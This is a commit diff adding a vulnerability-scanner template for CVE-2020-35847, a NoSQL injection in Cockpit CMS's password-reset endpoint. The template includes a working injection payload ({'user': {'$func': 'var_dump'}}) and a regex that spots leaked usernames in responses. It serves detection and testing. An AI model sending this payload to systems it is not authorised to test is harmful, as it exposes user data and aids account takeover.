Add CVE-2020-35847
parent
ccb620bf73
commit
65a7eae942
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2020-35847
|
||||
|
||||
info:
|
||||
name: Cockpit prior to 0.12.0 NoSQL injection in /auth/resetpassword
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
resetpassword method of the Auth controller,
|
||||
which is responsible for changing the user password using the reset token.
|
||||
reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
|
||||
tags: cve,cve2020,nosqli,sqli
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/auth/requestreset"
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |
|
||||
{
|
||||
"user": {
|
||||
"$func": "var_dump"
|
||||
}
|
||||
}
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'
|
Loading…
Reference in New Issue